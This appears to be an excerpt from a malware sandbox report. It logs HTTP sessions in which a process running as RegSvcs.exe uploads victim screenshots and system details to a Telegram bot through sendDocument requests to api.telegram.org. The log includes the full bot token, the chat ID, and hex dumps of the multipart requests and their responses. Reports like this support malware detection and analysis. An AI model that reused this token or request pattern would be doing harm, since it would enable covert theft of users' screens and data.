40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:53:06 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:53:06 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:53:06 UTC	1360	OUT	Data Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5 Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
2024-12-06 04:53:06 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 30 34 36 32 34 35 65 39 33 32 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd4046245e9326--
2024-12-06 04:53:06 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:53:07 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:53:07 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170404,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460787,"document":{"file_name":"user-610930 2025-01-29 09-20-15.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZpGdSgzPnzRj_IPLtHTWH1kVtGGnFAALyFAACOh6ZUg5uzHD8QyCRAQAHbQADNgQ","file_unique_id":"AQAD8hQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZpGdSgzPnzRj_IPLtHTWH1kVtGGnFAALyFAACOh6ZUg5uzHD8QyCRAQAHbQADNgQ","file_unique_id":"AQAD8hQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaRnUoMz580Y_yDy7R01h9ZFbRhpxQAC8hQAAjoemVIObsxw_EMgkTYE","file_unique_id":"AgAD8hQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 01/29/2025 09:20:08\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49921	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:53:08 UTC	238	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd42db9af1601b Host: api.telegram.org Content-Length: 66946 Expect: 100-continue
2024-12-06 04:53:08 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 32 64 62 39 61 66 31 36 30 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 32 64 62 39 61 66 31 36 30 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 30 31 2f 32 30 32 35 20 31 36 3a 30 35 3a 31 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd42db9af1601bContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd42db9af1601bContent-Disposition: form-data; name="caption"New SC Recovered!Time: 02/01/2025 16:05:10User
2024-12-06 04:53:08 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:53:08 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:53:08 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:53:08 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:53:08 UTC	1360	OUT	Data Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5 Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
2024-12-06 04:53:08 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 32 64 62 39 61 66 31 36 30 31 62 2d 2d 0d 0a Data Ascii: -----------------------------8dd42db9af1601b--
2024-12-06 04:53:09 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:53:09 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:53:09 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170405,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460789,"document":{"file_name":"user-610930 2025-02-01 16-15-12.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZpWdSgzVBoMDt-p5M-bs8MMcsAoa6AALzFAACOh6ZUl9VYxuQFwREAQAHbQADNgQ","file_unique_id":"AQAD8xQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZpWdSgzVBoMDt-p5M-bs8MMcsAoa6AALzFAACOh6ZUl9VYxuQFwREAQAHbQADNgQ","file_unique_id":"AQAD8xQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaVnUoM1QaDA7fqeTPm7PDDHLAKGugAC8xQAAjoemVJfVWMbkBcERDYE","file_unique_id":"AgAD8xQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 02/01/2025 16:05:10\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49948	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:53:21 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd4a9ba686c827 Host: api.telegram.org Content-Length: 66946 Expect: 100-continue Connection: Keep-Alive
2024-12-06 04:53:21 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 61 39 62 61 36 38 36 63 38 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 61 39 62 61 36 38 36 63 38 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 31 31 2f 32 30 32 35 20 31 32 3a 35 37 3a 32 34 0a 55 73 65 72 Data Ascii: -----------------------------8dd4a9ba686c827Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd4a9ba686c827Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/11/2025 12:57:24User
2024-12-06 04:53:21 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:53:21 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:53:21 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:53:21 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:53:21 UTC	1360	OUT	Data Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5 Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
2024-12-06 04:53:21 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 61 39 62 61 36 38 36 63 38 32 37 2d 2d 0d 0a Data Ascii: -----------------------------8dd4a9ba686c827--
2024-12-06 04:53:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:53:22 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:53:22 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170406,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460802,"document":{"file_name":"user-610930 2025-02-11 